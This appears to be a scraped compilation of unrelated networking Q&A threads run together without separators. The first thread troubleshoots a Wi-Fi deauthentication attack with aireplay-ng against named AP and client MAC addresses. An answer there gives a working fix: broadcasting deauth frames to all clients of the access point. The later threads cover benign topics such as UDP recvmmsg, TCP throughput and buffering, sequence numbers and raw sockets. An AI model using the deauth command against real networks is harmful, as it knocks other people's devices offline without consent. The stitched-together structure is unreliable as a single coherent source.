I have been trying a "deauth" attack in Kali Linux, but I do not get any ACKs:
root@kali:~# aireplay-ng --deauth 200 -a 6A:15:90:F4:4D:82 -c F8:F1:B6:E8:E6:2A --ignore-negative-one wlan0mon
12:26:31 Waiting for beacon frame (BSSID: 6A:15:90:F4:4D:82) on channel 9
12:26:32 Sending 64 directed DeAuth. STMAC: [F8:F1:B6:E8:E6:2A] [ 0| 0 ACKs]
12:26:32 Sending 64 directed DeAuth. STMAC: [F8:F1:B6:E8:E6:2A] [ 0| 0 ACKs]
12:26:41 Sending 64 directed DeAuth. STMAC: [F8:F1:B6:E8:E6:2A] [ 0| 0 ACKs]
12:26:42 Sending 64 directed DeAuth. STMAC: [F8:F1:B6:E8:E6:2A] [ 0| 0 ACKs]
12:26:52 Sending 64 directed DeAuth. STMAC: [F8:F1:B6:E8:E6:2A] [ 0| 0 ACKs]
12:26:52 Sending 64 directed DeAuth. STMAC: [F8:F1:B6:E8:E6:2A] [ 0| 0 ACKs]
12:27:02 Sending 64 directed DeAuth. STMAC: [F8:F1:B6:E8:E6:2A] [ 0| 0 ACKs]
12:27:03 Sending 64 directed DeAuth. STMAC: [F8:F1:B6:E8:E6:2A] [ 0| 0 ACKs]
12:27:13 Sending 64 directed DeAuth. STMAC: [F8:F1:B6:E8:E6:2A] [ 0| 0 ACKs]
12:27:13 Sending 64 directed DeAuth. STMAC: [F8:F1:B6:E8:E6:2A] [ 0| 0 ACKs]
How can I make this attack work?
Thanks
So what is the meaning of [28|63 ACKs]??
It means:
[ ACKs received from the client | ACKs received from the AP ]
In this case, 28 ACKs were received from the client and 63 ACKs from the AP.
In your case, a zero value definitely tells you that the client and/or the AP did not hear your packets.
It is possible that no client is connected to your target AP.
I know this is old, but just remove the "-c" option and you should be fine.
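For example (reusing only the options already shown above), the command without the client MAC would be something like:
aireplay-ng --deauth 200 -a 6A:15:90:F4:4D:82 --ignore-negative-one wlan0mon
Without -c, aireplay-ng broadcasts the deauthentication frames to all clients of the AP, so the attack does not depend on ACKs from that one client.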
I have implemented a webcrawler with libcurl and libev. My intention was to make a high performance crawler that uses all available bandwidth. I have succeeded in making a crawler that can sustain over 10,000 parallel connections. However, the stats for bandwidth usage are not all that impressive. Here is some example output from vnstat:
rx | tx
--------------------------------------+------------------
bytes 32.86 GiB | 3.12 GiB
--------------------------------------+------------------
max 747.99 Mbit/s | 25.73 Mbit/s
average 15.69 Mbit/s | 1.49 Mbit/s
min 2.62 kbit/s | 12.29 kbit/s
--------------------------------------+------------------
packets 33015363 | 23137442
--------------------------------------+------------------
max 68804 p/s | 28998 p/s
average 1834 p/s | 1285 p/s
min 5 p/s | 5 p/s
--------------------------------------+------------------
time 299.95 minutes
As you can see, my average download speed is only 15.69 Mbit/s, while the network bandwidth can support much more. I do not understand why the application downloads so slowly while still maintaining over 10,000 parallel connections. Is this something to do with the URLs being downloaded? If I repeatedly download www.google.com, www.yahoo.com and www.bing.com, I can achieve speeds of up to 7 Gbps, but with general crawling the speed is as shown above.
Any thoughts or ideas?
I have a UDP client (I have no control over its source code) that constantly sends data frames, one frame every 500 ms, and a UDP server that checks the last frame every 5 seconds.
The problem is that the UDP server does not read the most recent frame, but only the next frame queued in the operating system's UDP receive buffer.
n = recvfrom(server_sockfd, buf, BUFSIZE, 0,
             (struct sockaddr *) &new_dax[eqpID].clientaddr,
             &new_dax[eqpID].clientlen);
With this code, if my UDP client sends:
FRAME 1 ->500ms
FRAME 2->500ms
FRAME 3->500ms
FRAME X->500ms
My UDP server first receives FRAME 1, and then, 5 seconds later, when I try to read the frame from the client again, the server receives FRAME 2 instead of FRAME X.
How do I get the last frame received? I tried closing the server socket and reopening it whenever I want to read the latest frame, but that consumes too many resources. Is it possible without closing the server socket?
Thanks!
You can use recvmmsg() to receive a whole bunch of messages at once. So in your case, you expect to receive about 10 messages per read, so set up buffers for 12-15 messages and just call recvmmsg() once, then ignore all but the last message.
You'll want to use the MSG_WAITFORONE flag, so that recvmmsg() doesn't block until all 12-15 messages are received--you only expect to receive 9-11 or so.
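For illustration, here is a minimal sketch of that approach (untested; server_sockfd is the socket from the question, while the batch size of 15 and the 1500-byte frame size are assumptions):

#define _GNU_SOURCE          /* recvmmsg() and MSG_WAITFORONE are GNU extensions */
#include <string.h>
#include <sys/socket.h>

#define VLEN     15          /* a bit more than the ~10 frames expected per 5 s */
#define FRAMELEN 1500

/* Drain everything queued on the socket in one call and keep only the newest
   frame. Returns its length, or -1 on error. */
static ssize_t read_latest_frame(int server_sockfd, char *out, size_t outlen)
{
    struct mmsghdr msgs[VLEN];
    struct iovec   iovs[VLEN];
    char           bufs[VLEN][FRAMELEN];

    memset(msgs, 0, sizeof(msgs));
    for (int i = 0; i < VLEN; i++) {
        iovs[i].iov_base           = bufs[i];
        iovs[i].iov_len            = FRAMELEN;
        msgs[i].msg_hdr.msg_iov    = &iovs[i];
        msgs[i].msg_hdr.msg_iovlen = 1;
    }

    /* MSG_WAITFORONE: block until at least one datagram is available, then
       return whatever else is already queued (up to VLEN) without blocking. */
    int n = recvmmsg(server_sockfd, msgs, VLEN, MSG_WAITFORONE, NULL);
    if (n <= 0)
        return -1;

    size_t len = msgs[n - 1].msg_len;        /* the last message is the newest */
    if (len > outlen)
        len = outlen;
    memcpy(out, bufs[n - 1], len);
    return (ssize_t) len;
}

Calling this every 5 seconds discards the stale frames and hands back only the latest one, without closing and reopening the socket.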
I am using OCB mode, based on the ath9k driver, for the wireless connections between different nodes. I need to know the signal strength of received packets in my user-space application in order to do some calculations based on it. For communication I am using the socket API and UDP packets.
So, here is the question: Is there any function or API in C to get signal strength of a received packet in a user-space application?
I don't know if the signal strength "of a received packet" really makes sense, but you can get some information about the Wi-Fi signal of the network you are connected to by reading /proc/net/wireless:
$ cat /proc/net/wireless
Inter-| sta-|   Quality        |   Discarded packets               | Missed | WE
 face | tus | link level noise |  nwid  crypt   frag  retry   misc | beacon | 22
 wlan0: 0000   69.  -41.  -256      0      0      0      1    274        0
Generally speaking, /proc provides runtime information about your system. Technically speaking, if you wish to read this from a C program, first check whether there is an API for it; otherwise open the file, read and parse its content, and close it. See this thread for details about reading the /proc filesystem.
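As a rough sketch (assuming the column layout shown above; the exact format can vary between kernels and drivers), parsing the file from C could look like this:

#include <stdio.h>
#include <string.h>

/* Read the link quality and signal level for one interface from
   /proc/net/wireless. Returns 0 on success, -1 if not found or on error. */
static int read_wireless_level(const char *ifname, float *link, float *level)
{
    FILE *f = fopen("/proc/net/wireless", "r");
    char line[256];

    if (!f)
        return -1;

    while (fgets(line, sizeof line, f)) {
        char name[32];
        unsigned int status;
        float q_link, q_level;

        /* Data lines look like: "wlan0: 0000   69.  -41.  -256 ..." */
        if (sscanf(line, " %31[^:]: %x %f %f", name, &status, &q_link, &q_level) == 4
            && strcmp(name, ifname) == 0) {
            *link  = q_link;
            *level = q_level;   /* signal level, in dBm on most drivers */
            fclose(f);
            return 0;
        }
    }
    fclose(f);
    return -1;
}

Note that this reports the current per-interface signal level, not a per-packet value.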
You should use cfg80211, see http://www.linuxwireless.org/en/developers/Documentation/cfg80211/
I have a server and a client. They run on two different machines, and both machines have two 1000 Mbit/s network adapters.
I am using blocking TCP sockets in both the server and the client.
Server
Once a connection is accepted, a new thread is started to process it. It works like this:
while (1) {
    recv();  /* receive a char */
    send();  /* send a line */
}
The client just sends a single char to the server, and the server sends back a line of text; the length of the text is about 200 characters.
The line has been loaded into memory in advance.
Client
The client uses multiple threads to connect to the server. Once connected, each thread works like this:
while (1) {
    send();  /* send a char */
    recv();  /* receive a line */
}
Bandwidth usage
When I use 100 threads in the client (with more threads the result is almost the same), I see this network traffic on the server:
tsar -l -i 1 --traffic
the result:
Time -------------traffic------------
Time bytin bytout pktin pktout
06/09/14-23:12:56 0.00 0.00 0.00 0.00
06/09/14-23:12:57 63.4M 155.3M 954.6K 954.6K
06/09/14-23:12:58 0.00 0.00 0.00 0.00
06/09/14-23:12:59 60.1M 147.3M 905.4K 905.4K
06/09/14-23:13:00 0.00 0.00 0.00 0.00
06/09/14-23:13:01 57.5M 140.8M 866.5K 866.4K
and sar -n DEV 1:
11:20:46 PM IFACE rxpck/s txpck/s rxkB/s txkB/s rxcmp/s txcmp/s rxmcst/s
11:20:47 PM lo 0.00 0.00 0.00 0.00 0.00 0.00 0.00
11:20:47 PM eth0 478215.05 478217.20 31756.46 77744.95 0.00 0.00 0.00
11:20:47 PM eth1 484318.28 484318.28 32162.05 78724.16 0.00 0.00 1.08
11:20:47 PM bond0 962533.33 962535.48 63918.51 156469.11 0.00 0.00 1.08
Question:
In theory, the maximum value of (bytin + bytout) could be 256M. How can I achieve that?
Any help would be great, thanks in advance.
In practice there is some overhead at several layers. 1 Gbit/s Ethernet does not mean you get that much on the application side (I would guess at most 90% of it). A rule of thumb is to send or recv fairly large chunks of data (several kilobytes at least); sending or receiving a few hundred bytes at a time is inefficient. And the question is surely OS-specific (I am assuming Linux).
Recall that, by definition, TCP is not a transmission of packets but of a stream of bytes; read the TCP Wikipedia page. You should avoid send-ing or recv-ing a few bytes, or even a hundred of them; try to send thousands of bytes each time. Of course, a single recv on the receiving side does not (in general) correspond to a single send on the emitting side, and vice versa (especially if there are routers between the sending and receiving computers; routers can split or coalesce network packets, so you cannot count on one recv at the receiver per send at the emitter).
Gigabit Ethernet works best with jumbo frames of nearly 9000 bytes. You probably want the data buffer you pass to send to be a little below that (because of the various IP and TCP overheads), so try 8 Kbytes.
The send(2) man page mentions the MSG_MORE flag for tcp(7). You could use it, with care.
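For illustration, a small sketch (not from the question's code; sockfd, header and body are placeholders) of coalescing a short header and its body into one outgoing segment with MSG_MORE:

#include <sys/types.h>
#include <sys/socket.h>

static void send_header_and_body(int sockfd,
                                 const void *header, size_t header_len,
                                 const void *body, size_t body_len)
{
    /* MSG_MORE tells the kernel more data follows, so it holds the small
       header back (much like TCP_CORK) instead of emitting a tiny segment. */
    send(sockfd, header, header_len, MSG_MORE);
    /* The second call, without MSG_MORE, lets the kernel flush the
       coalesced data. Error handling is omitted for brevity. */
    send(sockfd, body, body_len, 0);
}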
System calls (see syscalls(2)) also have some overhead; I'm surprised you are able to make a million of them each second. That overhead is another reason for buffering both outgoing and incoming data in sizeable pieces (e.g. 8192, 16384, or 32768 bytes each; you need to benchmark to find the best size). And I would not be surprised if the kernel preferred page-aligned data, so perhaps align your buffers to 4096 bytes (e.g. using mmap(2) or posix_memalign(3)).
If you care about performance, don't call send(2) with a small byte count. At the very least, change your application to send more than a few kilobytes (e.g. 4 Kbytes) per send syscall, and pass recv(2) a buffer of at least 4 kilobytes. Sending or receiving a single byte, or a line of a hundred bytes, is inefficient. Your application should buffer such data (and perhaps split it into "application messages"). There are libraries that do this (like 0MQ), or you can at least terminate each message with a delimiter (a newline, perhaps), which makes it easy to split a received buffer into several incoming application messages.
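As a rough sketch of such application-side output buffering (illustrative only, with simplified error and partial-send handling):

#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>

#define OUTBUF_SIZE 8192    /* roughly one jumbo frame worth of payload */

struct outbuf {
    char   data[OUTBUF_SIZE];
    size_t used;
};

/* Push everything currently buffered to the kernel in large send() calls. */
static int outbuf_flush(int fd, struct outbuf *b)
{
    size_t off = 0;
    while (off < b->used) {
        ssize_t n = send(fd, b->data + off, b->used - off, 0);
        if (n < 0)
            return -1;
        off += (size_t) n;
    }
    b->used = 0;
    return 0;
}

/* Queue one small application message; only hit the kernel when the
   buffer is full (or when the caller flushes explicitly). */
static int outbuf_write(int fd, struct outbuf *b, const char *msg, size_t len)
{
    if (len > OUTBUF_SIZE) {                 /* oversized: flush, then send directly */
        if (outbuf_flush(fd, b) < 0)
            return -1;
        return send(fd, msg, len, 0) < 0 ? -1 : 0;
    }
    if (b->used + len > OUTBUF_SIZE && outbuf_flush(fd, b) < 0)
        return -1;
    memcpy(b->data + b->used, msg, len);
    b->used += len;
    return 0;
}

With something like this, a hundred 200-byte lines become a single send of a few kilobytes instead of a hundred tiny syscalls.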
My feeling is that your application is inefficient and fragile (it would probably behave badly on other networks, e.g. with routers between the two computers). You need to redesign and recode parts of it: buffer your I/O, and manage application messages explicitly, splitting and joining them as needed.
You should test your application on several networks, in particular over ADSL and Wi-Fi and, if possible, over a long-distance link (you will then observe that send and recv calls do not "match").
According to my math, you are relatively close to saturating the link.
As I understand it, this is one second of traffic.
Time -------------traffic------------
Time bytin bytout pktin pktout
06/09/14-23:12:57 63.4M 155.3M 954.6K 954.6K
A TCP packet sent over Ethernet has 82 bytes of overhead (42 Ethernet, 20 IP, 20 TCP), so the amount of data received is (954.6k * 82 + 63.4M) * 8 bits, which totals about 1.1 Gbit.
I would assume that with such a large number of packets, there would be additional overhead involved with negotiation of the physical medium. Since the links have about 50% utilization, if there's an additional delay as small as (1s / 954.6k) * 50% = 500 ns (one half microsecond!) then you've accounted for the additional delay. 500 ns is the amount of time it takes for light to travel 150 meters, which isn't that far.
I'm writing a C/C++ client-server program under Linux. Assume a message m is to be sent from the client to the server.
Is it possible for the client to read the TCP sequence number of the packet which will carry m, before sending m?
In fact, I'd like to append this sequence number to m, and send the resulting packet. (Well, things are more complicated, but let's keep it that simple. In fact, I'd like to apply authentication info to this sequence number, and then append it to m.)
Moreover,
is it possible for the server to read the TCP sequence number of the packet carrying m?
You can do something very nearly equivalent to this: count all the bytes you send, and append the count of all bytes sent before the message to the end of your message.
I get really nervous anytime anybody talks about 'packets' with TCP. Because if you talk about packets and TCP at the same time you are mixing protocol levels that shouldn't be mixed. There is no meaningful correspondence between data you send in TCP and the packets that are sent via IP.
Yes, there are sequence numbers in IP packets used to send TCP information. These sequence numbers are a count of the number of bytes (aka octets) sent so far. They identify where in the stream the bytes in the packet belong, but they are otherwise unrelated to the packet.
If a resend happens, or if you're using the Nagle algorithm, or if the TCP stack feels like it that day, you may end up with two send operations ending up in the same packet. Or, you might end up with half of one send operation ending up in one packet, and half in another packet. And each of those packets will have their own sequence numbers.
As I said, there is absolutely no meaningful relationship between send operations you perform at the transport layer and the packets sent at the network layer. I'm not talking theoretically either. It's not 'really all packets underneath and the send generally, barring some weird condition, puts all the bytes in a single packet'. No, the scenarios I outlined above where the bytes from a single send operation are spread to multiple packets happen frequently and under unpredictable conditions.
So, I don't know why you want to know anything about the sequence numbers in packets. But if you were using the sequence number as a proxy for number of bytes sent, you can keep that count yourself and just stuff it into the stream yourself. And remember to count those bytes too.
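A minimal sketch of that idea (the names and the 4-byte network-order counter are illustrative assumptions, not anything mandated by TCP):

#include <stdint.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <arpa/inet.h>     /* htonl */

struct counted_conn {
    int      fd;
    uint32_t bytes_sent;   /* running count of bytes sent on this connection */
};

/* Send msg followed by the count of bytes sent before this message,
   in network byte order. Returns 0 on success, -1 on error. */
static int send_with_count(struct counted_conn *c, const char *msg, size_t len)
{
    char frame[1024];
    uint32_t count_net = htonl(c->bytes_sent);

    if (len + sizeof count_net > sizeof frame)
        return -1;                            /* keep the sketch simple */

    memcpy(frame, msg, len);
    memcpy(frame + len, &count_net, sizeof count_net);

    size_t total = len + sizeof count_net, off = 0;
    while (off < total) {
        ssize_t n = send(c->fd, frame + off, total - off, 0);
        if (n < 0)
            return -1;
        off += (size_t) n;
    }
    c->bytes_sent += total;                   /* count the appended bytes too */
    return 0;
}

This keeps the counter entirely at the application layer, which is the only layer you actually control from user space.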
No, you can't do that -- at least not with the expected result.
This is because:
TCP is stream based, not packet based.
TCP sequence numbers count bytes, not packets.
The underlying TCP layer does the segmentation for you.
The TCP window size and segment size are dynamic.
This means you might send a "packet" with the sequence number at its end, only to find that the underlying machinery has re-segmented your "packet".
What you want:
1 2 3 4
+---+---+---+---+
| A | B | C |"1"| packet 1, seq=1, len=4
+---+---+---+---+
5 6 7 8
+---+---+---+---+
| A | B | C |"5"| packet 2, seq=5, len=4
+---+---+---+---+
What you might get:
1 2 3 4
+---+---+---+---+
| A | B | C |"1"| packet 1 (seq=1, len=4)
+---+---+---+---+
(packet 1 got lost)
1 2 3 4 5 6
+---+---+---+---+---+---+
| A | B | C |"1"| A | B | packet 1, resent, seq=1, len=6
+---+---+---+---+---+---+
7 8
+---+---+
| C |"5"| packet 2, seq=7, len=2
+---+---+
The TCP/IP stack does all of this for you: you receive only the payload. The stack removes all the headers and delivers the payload to user space.
If you really want to add or modify anything at the packet-header level, try raw sockets. A raw socket receives/sends packets directly from the network card, irrespective of the transport type (TCP or UDP). In that case you have to strip/add all the headers (TCP/UDP header, IP header and Ethernet header) around your payload yourself.
Check out a good video tutorial on raw sockets.
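For illustration, a rough Linux-specific sketch of reading whole frames on a raw socket (requires root or CAP_NET_RAW; not taken from the tutorial):

#include <stdio.h>
#include <unistd.h>
#include <sys/socket.h>
#include <arpa/inet.h>        /* htons */
#include <linux/if_ether.h>   /* ETH_P_ALL, ETH_FRAME_LEN */

int main(void)
{
    /* SOCK_RAW on AF_PACKET delivers whole Ethernet frames, with the
       Ethernet, IP and TCP/UDP headers still attached. */
    int fd = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL));
    if (fd < 0) {
        perror("socket");
        return 1;
    }

    unsigned char frame[ETH_FRAME_LEN];
    for (;;) {
        ssize_t n = recv(fd, frame, sizeof frame, 0);
        if (n < 0) {
            perror("recv");
            break;
        }
        /* Bytes 0..13 are the Ethernet header; the IP header (and, inside
           the TCP header that follows it, the sequence number) starts at
           offset 14. Parsing those headers is up to you at this level. */
        printf("got a frame of %zd bytes\n", n);
    }
    close(fd);
    return 0;
}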